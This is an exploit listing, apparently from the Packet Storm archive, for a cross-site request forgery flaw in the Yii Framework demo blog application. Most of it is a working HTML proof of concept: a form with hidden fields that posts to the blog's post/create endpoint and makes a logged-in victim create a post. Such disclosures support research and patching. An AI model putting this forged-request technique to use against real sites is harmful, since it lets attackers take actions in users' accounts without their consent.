Yii Framework Blog Cross Site Request Forgery

2014-03-03T00:00:00
ID PACKETSTORM:125511
Type packetstorm
Reporter Christy Philip Mathew
Modified 2014-03-03T00:00:00

Description

                                        
                                            `# Exploit Title: Yii Framework Blog Application CSRF Vulnerability  
# Date: 3 Mar 2014  
# Author: Christy Philip Mathew  
# Demo: Yii Blog Application - http://www.yiiframework.com/demos/blog/  
# Category:: web  
# Tested on: Windows 8  
  
Attacker will be able to create a post.  
  
<html>  
  
<body>  
<form action="  
http://www.yiiframework.com/demos/blog/index.php/post/create" method="POST">  
<input type="hidden" name="Post[title]" value="test" />  
<input type="hidden" name="Post[content]" value="test" />  
<input type="hidden" name="Post[tags]" value="test" />  
<input type="hidden" name="Post[status]" value="2" />  
<input type="hidden" name="yt0" value="Create" />  
<input type="submit" value="Submit form" />  
</form>  
</body>  
</html>  
`